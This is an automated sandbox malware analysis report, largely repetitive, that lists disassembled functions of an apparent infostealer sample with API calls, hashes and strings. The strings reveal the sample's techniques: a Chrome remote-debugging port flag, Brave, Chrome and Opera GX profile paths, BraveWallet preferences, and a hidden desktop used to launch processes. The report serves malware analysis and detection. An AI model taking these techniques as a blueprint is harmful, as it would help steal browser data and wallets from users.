                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Filelstrcat$lstrcpylstrlen$CopyDeleteFind$_memset$CloseFirstNextSystemTime
                                                                                                                                                                                                                                                          • String ID: --remote-debugging-port=9223 --profile-directory="$ --remote-debugging-port=9223 --profile-directory="$Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
                                                                                                                                                                                                                                                          • API String ID: 59875412-4126839318
                                                                                                                                                                                                                                                          • Opcode ID: e61b6b02bc46670c73600b35d91dfd18458bae3f83ba4239adeabdd4b5386e43
                                                                                                                                                                                                                                                          • Instruction ID: 6a26f8a774db1d766dd325de54f69fa689087ec040f4ab398e27c217c50478b8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e61b6b02bc46670c73600b35d91dfd18458bae3f83ba4239adeabdd4b5386e43
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0521A7290016D9BCF61BB25DC46ADD7778AF04300F4141E1BA48B7126DAB9AF89EF81
                                                                                                                                                                                                                                                          Function 00FF4EA5 Relevance: 49.3, APIs: 24, Strings: 4, Instructions: 297filestringCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00FF4EF9
                                                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?), ref: 00FF4F10
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FF4F2C
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FF4F3D
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,010159E0), ref: 00FF4F5E
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,010159E4), ref: 00FF4F78
                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00FF4F9F
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,01015616), ref: 00FF4FB3
                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00FF4FDC
                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00FF4FF3
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FF5005
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00FF501A
                                                                                                                                                                                                                                                          • strtok_s.MSVCRT ref: 00FF505F
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FF5071
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00FF5086
                                                                                                                                                                                                                                                          • strtok_s.MSVCRT ref: 00FF509F
                                                                                                                                                                                                                                                          • PathMatchSpecA.SHLWAPI(?,00000000), ref: 00FF50B4
                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?,01015A10,01015617), ref: 00FF516D
                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 00FF517D
                                                                                                                                                                                                                                                            • Part of subcall function 00FF2389: CreateFileA.KERNEL32(00FF5189,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00FF5189,?), ref: 00FF23A4
                                                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FF5193
                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?,00000000,?,000003E8,00000000), ref: 00FF519E
                                                                                                                                                                                                                                                          • strtok_s.MSVCRT ref: 00FF51C4
                                                                                                                                                                                                                                                          • FindNextFileA.KERNEL32(?,?), ref: 00FF52E2
                                                                                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 00FF5302
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: File$_memsetlstrcatwsprintf$Findlstrcpystrtok_s$Delete$CloseCopyCreateFirstMatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
                                                                                                                                                                                                                                                          • String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                                                                                                                                                                                                          • API String ID: 956187361-332874205
                                                                                                                                                                                                                                                          • Opcode ID: c7df6cf2796ff8eb21b43c3823a0f18dbce9f64a06453a162143d2e6d5273e33
                                                                                                                                                                                                                                                          • Instruction ID: 8f09362457ea3b3097b8e7314efc21748de4d1f0ebe16b515725e2dedc756730
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7df6cf2796ff8eb21b43c3823a0f18dbce9f64a06453a162143d2e6d5273e33
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1FC11872D0021EAFCF22AB64DC45AEE777DAF04300F4045A5FB08A7155DB75AB859F90
                                                                                                                                                                                                                                                          Function 00FF61AE Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 205stringfileCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                                                                                                                                                                                                                                          • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                                                                                                          • API String ID: 2178766154-445461498
                                                                                                                                                                                                                                                          • Opcode ID: 113cef2e6e214ef5d9a80e27ee6b945851449370ac5cbfc02d7bed4173c722bc
                                                                                                                                                                                                                                                          • Instruction ID: d2b312265f5eb44374d62fbf97a1a1802016850395aaa14c612a7344701c5dcd
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 113cef2e6e214ef5d9a80e27ee6b945851449370ac5cbfc02d7bed4173c722bc
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F81147290022D9FCF60EB65DC49ADE77B8BF04300F4085E5E688A3115EF79AA859F90
                                                                                                                                                                                                                                                          Function 00FF5CE8 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 179filestringmemoryCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00FF5D0D
                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00FF5D14
                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00FF5D2D
                                                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?), ref: 00FF5D44
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,01015A80), ref: 00FF5D65
                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,01015A84), ref: 00FF5D7F
                                                                                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 00FF5E63
                                                                                                                                                                                                                                                            • Part of subcall function 00FF59EA: _memset.LIBCMT ref: 00FF5A22
                                                                                                                                                                                                                                                            • Part of subcall function 00FF59EA: _memset.LIBCMT ref: 00FF5A33
                                                                                                                                                                                                                                                            • Part of subcall function 00FF59EA: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 00FF5A5E
                                                                                                                                                                                                                                                            • Part of subcall function 00FF59EA: lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 00FF5A7C
                                                                                                                                                                                                                                                            • Part of subcall function 00FF59EA: lstrcatA.KERNEL32(?,?,?,?,?,?,?,?), ref: 00FF5A90
                                                                                                                                                                                                                                                            • Part of subcall function 00FF59EA: lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 00FF5AA3
                                                                                                                                                                                                                                                            • Part of subcall function 00FF59EA: StrStrA.SHLWAPI(00000000), ref: 00FF5B47
                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 00FF5E86
                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00FF5DA6
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1E6D: GetSystemTime.KERNEL32(?,010157AE,?), ref: 00FF1E9C
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
                                                                                                                                                                                                                                                          • FindNextFileA.KERNEL32(?,?), ref: 00FF5EB5
                                                                                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 00FF5EC9
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?), ref: 00FF5EF7
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?), ref: 00FF5F0A
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00FF5F16
                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00FF5F33
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcat$Filelstrcpy$Findlstrlen$Heap_memsetwsprintf$AllocCloseCopyDeleteFirstNextProcessSystemTime
                                                                                                                                                                                                                                                          • String ID: %s\%s$%s\*
                                                                                                                                                                                                                                                          • API String ID: 2636950706-2848263008
                                                                                                                                                                                                                                                          • Opcode ID: dd4630f2d13a89e03e14192911a9e33c58cac1e5ae6d6f24f76fa5fec2f61bf4
                                                                                                                                                                                                                                                          • Instruction ID: 9c76c62aaceccfe9ae207fd38dac4c94778b1670efd5d1a7c9efa91d356a526b
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dd4630f2d13a89e03e14192911a9e33c58cac1e5ae6d6f24f76fa5fec2f61bf4
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 437128B294022C9FCF60AB60DC49ADD7779AF45310F4004E5B708A3116EB75AF85DF95
                                                                                                                                                                                                                                                          Function 00FE829D Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 149stringsleepprocessCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FE82DE
                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00FE82F7
                                                                                                                                                                                                                                                          • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00FE8310
                                                                                                                                                                                                                                                          • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00FE832C
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FE834B
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00FE8360
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00FE8373
                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,010160F0), ref: 00FE8385
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FE8394
                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(?,00000000), ref: 00FE83C7
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FE83E2
                                                                                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 00FE843D
                                                                                                                                                                                                                                                          • Sleep.KERNEL32(00001388), ref: 00FE844C
                                                                                                                                                                                                                                                          • CloseDesktop.USER32(?), ref: 00FE8481
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _memset$Desktoplstrcat$Create$CloseOpenProcessSleeplstrcpywsprintf
                                                                                                                                                                                                                                                          • String ID: ChromeBuildTools$D
                                                                                                                                                                                                                                                          • API String ID: 3792893142-3322131035
                                                                                                                                                                                                                                                          • Opcode ID: e4aa9b4ce5cb369250996e49f2ec35427c67acbb55db88c880451dbdb753832a
                                                                                                                                                                                                                                                          • Instruction ID: ae277cfad0941f1fd2b91412b268f222774b8d585f3e3651b7e02acc35d6a735
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e4aa9b4ce5cb369250996e49f2ec35427c67acbb55db88c880451dbdb753832a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B05121B290021DAFDB22DFA4DC89EDA77BCBB18304F400495B609E6151EB759F859F60
                                                                                                                                                                                                                                                          Function 00FFBEF4 Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 440COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
